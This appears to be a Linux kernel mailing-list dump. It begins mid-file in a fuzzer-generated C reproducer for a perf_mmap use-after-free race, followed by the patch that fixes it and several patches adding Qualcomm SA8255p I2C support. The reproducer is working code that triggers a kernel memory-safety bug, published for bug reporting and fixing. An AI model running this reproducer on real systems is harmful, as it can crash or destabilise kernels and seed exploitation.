NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
From: Haocheng Yu <yuhaocheng035@gmail.com>
Syzkaller reported a refcount_t: addition on 0; use-after-free warning
in perf_mmap.
The issue is caused by a race condition between a failing mmap() setup
and a concurrent mmap() on a dependent event (e.g., using output
redirection).
In perf_mmap(), the ring_buffer (rb) is allocated and assigned to
event->rb with the mmap_mutex held. The mutex is then released to
perform map_range().
If map_range() fails, perf_mmap_close() is called to clean up.
However, since the mutex was dropped, another thread attaching to
this event (via inherited events or output redirection) can acquire
the mutex, observe the valid event->rb pointer, and attempt to
increment its reference count. If the cleanup path has already
dropped the reference count to zero, this results in a
use-after-free or refcount saturation warning.
Fix this by extending the scope of mmap_mutex to cover the
map_range() call. This ensures that the ring buffer initialization
and mapping (or cleanup on failure) happen atomically, effectively
preventing other threads from accessing a half-initialized or
dying ring buffer.
Reported-by: kernel test robot <lkp@intel.com>
Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 38 +++++++++++++++++++-------------------
1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..abefd1213582 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449
--
2.51.0
|
{
"author": "yuhaocheng035@gmail.com",
"date": "Tue, 3 Feb 2026 00:20:56 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
The "qup-memory" interconnect path is optional and may not be defined
in all device trees. Unroll the loop-based ICC path initialization to
allow specific error handling for each path type.
The "qup-core" and "qup-config" paths remain mandatory and will fail
probe if missing, while "qup-memory" is now handled as optional and
skipped when not present in the device tree.
Co-developed-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v1->v2:
Bjorn:
- Updated commit text.
- Used a local variable for better readability.
---
drivers/soc/qcom/qcom-geni-se.c | 36 +++++++++++++++++----------------
1 file changed, 19 insertions(+), 17 deletions(-)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index cd1779b6a91a..b6167b968ef6 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -899,30 +899,32 @@ EXPORT_SYMBOL_GPL(geni_se_rx_dma_unprep);
int geni_icc_get(struct geni_se *se, const char *icc_ddr)
{
- int i, err;
- const char *icc_names[] = {"qup-core", "qup-config", icc_ddr};
+ struct geni_icc_path *icc_paths = se->icc_paths;
if (has_acpi_companion(se->dev))
return 0;
- for (i = 0; i < ARRAY_SIZE(se->icc_paths); i++) {
- if (!icc_names[i])
- continue;
-
- se->icc_paths[i].path = devm_of_icc_get(se->dev, icc_names[i]);
- if (IS_ERR(se->icc_paths[i].path))
- goto err;
+ icc_paths[GENI_TO_CORE].path = devm_of_icc_get(se->dev, "qup-core");
+ if (IS_ERR(icc_paths[GENI_TO_CORE].path))
+ return dev_err_probe(se->dev, PTR_ERR(icc_paths[GENI_TO_CORE].path),
+ "Failed to get 'qup-core' ICC path\n");
+
+ icc_paths[CPU_TO_GENI].path = devm_of_icc_get(se->dev, "qup-config");
+ if (IS_ERR(icc_paths[CPU_TO_GENI].path))
+ return dev_err_probe(se->dev, PTR_ERR(icc_paths[CPU_TO_GENI].path),
+ "Failed to get 'qup-config' ICC path\n");
+
+ /* The DDR path is optional, depending on protocol and hw capabilities */
+ icc_paths[GENI_TO_DDR].path = devm_of_icc_get(se->dev, "qup-memory");
+ if (IS_ERR(icc_paths[GENI_TO_DDR].path)) {
+ if (PTR_ERR(icc_paths[GENI_TO_DDR].path) == -ENODATA)
+ icc_paths[GENI_TO_DDR].path = NULL;
+ else
+ return dev_err_probe(se->dev, PTR_ERR(icc_paths[GENI_TO_DDR].path),
+ "Failed to get 'qup-memory' ICC path\n");
}
return 0;
-
-err:
- err = PTR_ERR(se->icc_paths[i].path);
- if (err != -EPROBE_DEFER)
- dev_err_ratelimited(se->dev, "Failed to get ICC path '%s': %d\n",
- icc_names[i], err);
- return err;
-
}
EXPORT_SYMBOL_GPL(geni_icc_get);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:10 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
Add a new function geni_icc_set_bw_ab() that allows callers to set
average bandwidth values for all ICC (Interconnect) paths in a single
call. This function takes separate parameters for core, config, and DDR
average bandwidth values and applies them to the respective ICC paths.
This provides a more convenient API for drivers that need to configure
specific average bandwidth values.
Co-developed-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
drivers/soc/qcom/qcom-geni-se.c | 22 ++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 1 +
2 files changed, 23 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index b6167b968ef6..b0542f836453 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -946,6 +946,28 @@ int geni_icc_set_bw(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_icc_set_bw);
+/**
+ * geni_icc_set_bw_ab() - Set average bandwidth for all ICC paths and apply
+ * @se: Pointer to the concerned serial engine.
+ * @core_ab: Average bandwidth in kBps for GENI_TO_CORE path.
+ * @cfg_ab: Average bandwidth in kBps for CPU_TO_GENI path.
+ * @ddr_ab: Average bandwidth in kBps for GENI_TO_DDR path.
+ *
+ * Sets bandwidth values for all ICC paths and applies them. DDR path is
+ * optional and only set if it exists.
+ *
+ * Return: 0 on success, negative error code on failure.
+ */
+int geni_icc_set_bw_ab(struct geni_se *se, u32 core_ab, u32 cfg_ab, u32 ddr_ab)
+{
+ se->icc_paths[GENI_TO_CORE].avg_bw = core_ab;
+ se->icc_paths[CPU_TO_GENI].avg_bw = cfg_ab;
+ se->icc_paths[GENI_TO_DDR].avg_bw = ddr_ab;
+
+ return geni_icc_set_bw(se);
+}
+EXPORT_SYMBOL_GPL(geni_icc_set_bw_ab);
+
void geni_icc_set_tag(struct geni_se *se, u32 tag)
{
int i;
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 0a984e2579fe..980aabea2157 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -528,6 +528,7 @@ void geni_se_rx_dma_unprep(struct geni_se *se, dma_addr_t iova, size_t len);
int geni_icc_get(struct geni_se *se, const char *icc_ddr);
int geni_icc_set_bw(struct geni_se *se);
+int geni_icc_set_bw_ab(struct geni_se *se, u32 core_ab, u32 cfg_ab, u32 ddr_ab);
void geni_icc_set_tag(struct geni_se *se, u32 tag);
int geni_icc_enable(struct geni_se *se);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:11 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
The GENI Serial Engine drivers (I2C, SPI, and SERIAL) currently duplicate
code for initializing shared resources such as clocks and interconnect
paths.
Introduce a new helper API, geni_se_resources_init(), to centralize this
initialization logic, improving modularity and simplifying the probe
function.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v1 -> v2:
- Updated to return the proper value from devm_pm_opp_set_clkname()
---
drivers/soc/qcom/qcom-geni-se.c | 47 ++++++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 6 ++++
2 files changed, 53 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index b0542f836453..75e722cd1a94 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -19,6 +19,7 @@
#include <linux/of_platform.h>
#include <linux/pinctrl/consumer.h>
#include <linux/platform_device.h>
+#include <linux/pm_opp.h>
#include <linux/soc/qcom/geni-se.h>
/**
@@ -1012,6 +1013,52 @@ int geni_icc_disable(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_icc_disable);
+/**
+ * geni_se_resources_init() - Initialize resources for a GENI SE device.
+ * @se: Pointer to the geni_se structure representing the GENI SE device.
+ *
+ * This function initializes various resources required by the GENI Serial Engine
+ * (SE) device, including clock resources (core and SE clocks), interconnect
+ * paths for communication.
+ * It retrieves optional and mandatory clock resources, adds an OF-based
+ * operating performance point (OPP) table, and sets up interconnect paths
+ * with default bandwidths. The function also sets a flag (`has_opp`) to
+ * indicate whether OPP support is available for the device.
+ *
+ * Return: 0 on success, or a negative errno on failure.
+ */
+int geni_se_resources_init(struct geni_se *se)
+{
+ int ret;
+
+ se->core_clk = devm_clk_get_optional(se->dev, "core");
+ if (IS_ERR(se->core_clk))
+ return dev_err_probe(se->dev, PTR_ERR(se->core_clk),
+ "Failed to get optional core clk\n");
+
+ se->clk = devm_clk_get(se->dev, "se");
+ if (IS_ERR(se->clk) && !has_acpi_companion(se->dev))
+ return dev_err_probe(se->dev, PTR_ERR(se->clk),
+ "Failed to get SE clk\n");
+
+ ret = devm_pm_opp_set_clkname(se->dev, "se");
+ if (ret)
+ return ret;
+
+ ret = devm_pm_opp_of_add_table(se->dev);
+ if (ret && ret != -ENODEV)
+ return dev_err_probe(se->dev, ret, "Failed to add OPP table\n");
+
+ se->has_opp = (ret == 0);
+
+ ret = geni_icc_get(se, "qup-memory");
+ if (ret)
+ return ret;
+
+ return geni_icc_set_bw_ab(se, GENI_DEFAULT_BW, GENI_DEFAULT_BW, GENI_DEFAULT_BW);
+}
+EXPORT_SYMBOL_GPL(geni_se_resources_init);
+
/**
* geni_find_protocol_fw() - Locate and validate SE firmware for a protocol.
* @dev: Pointer to the device structure.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 980aabea2157..c182dd0f0bde 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -60,18 +60,22 @@ struct geni_icc_path {
* @dev: Pointer to the Serial Engine device
* @wrapper: Pointer to the parent QUP Wrapper core
* @clk: Handle to the core serial engine clock
+ * @core_clk: Auxiliary clock, which may be required by a protocol
* @num_clk_levels: Number of valid clock levels in clk_perf_tbl
* @clk_perf_tbl: Table of clock frequency input to serial engine clock
* @icc_paths: Array of ICC paths for SE
+ * @has_opp: Indicates if OPP is supported
*/
struct geni_se {
void __iomem *base;
struct device *dev;
struct geni_wrapper *wrapper;
struct clk *clk;
+ struct clk *core_clk;
unsigned int num_clk_levels;
unsigned long *clk_perf_tbl;
struct geni_icc_path icc_paths[3];
+ bool has_opp;
};
/* Common SE registers */
@@ -535,6 +539,8 @@ int geni_icc_enable(struct geni_se *se);
int geni_icc_disable(struct geni_se *se);
+int geni_se_resources_init(struct geni_se *se);
+
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
#endif
#endif
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:12 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
Currently, the core clock is handled individually in protocol drivers
such as the I2C driver. Move this clock management into the common
clock APIs (geni_se_clks_on/off()) already present in the GENI SE
driver to maintain consistency across all protocol drivers.
The core clock is now managed alongside the other clocks (se->clk and
the wrapper clocks) in the fundamental clock control functions,
eliminating the need for individual protocol drivers to handle it
separately.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
drivers/soc/qcom/qcom-geni-se.c | 14 +++++++++++++-
1 file changed, 13 insertions(+), 1 deletion(-)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index 75e722cd1a94..2e41595ff912 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -583,6 +583,7 @@ static void geni_se_clks_off(struct geni_se *se)
clk_disable_unprepare(se->clk);
clk_bulk_disable_unprepare(wrapper->num_clks, wrapper->clks);
+ clk_disable_unprepare(se->core_clk);
}
/**
@@ -619,7 +620,18 @@ static int geni_se_clks_on(struct geni_se *se)
ret = clk_prepare_enable(se->clk);
if (ret)
- clk_bulk_disable_unprepare(wrapper->num_clks, wrapper->clks);
+ goto err_bulk_clks;
+
+ ret = clk_prepare_enable(se->core_clk);
+ if (ret)
+ goto err_se_clk;
+
+ return 0;
+
+err_se_clk:
+ clk_disable_unprepare(se->clk);
+err_bulk_clks:
+ clk_bulk_disable_unprepare(wrapper->num_clks, wrapper->clks);
return ret;
}
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:13 +0530",
